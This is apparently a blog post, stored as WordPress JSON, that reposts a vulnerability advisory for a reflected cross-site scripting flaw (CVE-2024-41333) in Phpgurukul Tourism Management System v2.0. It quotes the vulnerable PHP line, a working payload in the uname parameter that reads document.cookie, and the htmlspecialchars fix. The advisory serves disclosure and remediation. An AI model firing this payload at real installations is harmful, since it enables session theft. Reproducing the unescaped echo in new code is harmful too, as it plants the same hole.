{"id":58594,"date":"2024-08-02T19:40:34","date_gmt":"2024-08-02T16:40:34","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/179891\/tms20-xss.txt"},"modified":"2024-08-02T19:40:34","modified_gmt":"2024-08-02T16:40:34","slug":"tourism-management-system-2-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/tourism-management-system-2-0-cross-site-scripting\/","title":{"rendered":"Tourism Management System 2.0 Cross Site Scripting"},"content":{"rendered":"

# Exploit Title: Tourism Management System v2.0 – Cross Site Scripting (XSS)
# Date: 13 July 2024
# Exploit Author: Sampath kumar kadajari
# Vendor Homepage: https:\/\/phpgurukul.com\/tourism-management-system-free-download\/
# Software Link: https:\/\/phpgurukul.com\/?sdm_process_download=1&download_id=7204
# Version: v2.0
# CVE: CVE-2024-41333
# Tested on: Windows, XAMPP, Apache, MySQL<\/p>\n

——————————————————————————————————————————————-<\/p>\n

A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute arbitrary code in the context of a user’s browser via injecting a crafted payload into the uname parameter.<\/p>\n

“Vulnerable Code” \u2013 (\/admin\/user-bookings.php)<\/p>\n

<h2>Manage <?php echo $_GET[‘uname’];?>’s Bookings<\/h2><\/p>\n

—> Affected Component: http:\/\/localhost\/tms\/admin\/user-bookings.php?uid=manju@gmail.com&&uname=%22%3E%3Cimg%20src\/onerror=prompt(document.cookie)%3E <\/p>\n

“Fix for Vulnerable Code” <\/p>\n

<h2>Manage <?php echo htmlspecialchars($_GET[‘uname’], ENT_QUOTES, ‘UTF-8’); ?>’s Bookings<\/h2><\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Tourism Management System v2.0 – Cross Site Scripting (XSS)# Date: 13 July 2024# Exploit Author: Sampath kumar kadajari# Vendor Homepage: https:\/\/phpgurukul.com\/tourism-management-system-free-download\/# Software Link: https:\/\/phpgurukul.com\/?sdm_process_download=1&download_id=7204 # Version: v2.0# CVE: CVE-2024-41333# Tested on: Windows, XAMPP, Apache, MySQL ——————————————————————————————————————————————- A reflected cross-site scripting (XSS) vulnerability in Phpgurukul Tourism Management System v2.0 allows attackers to execute …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-58594","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58594","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=58594"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/58594\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=58594"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=58594"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=58594"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}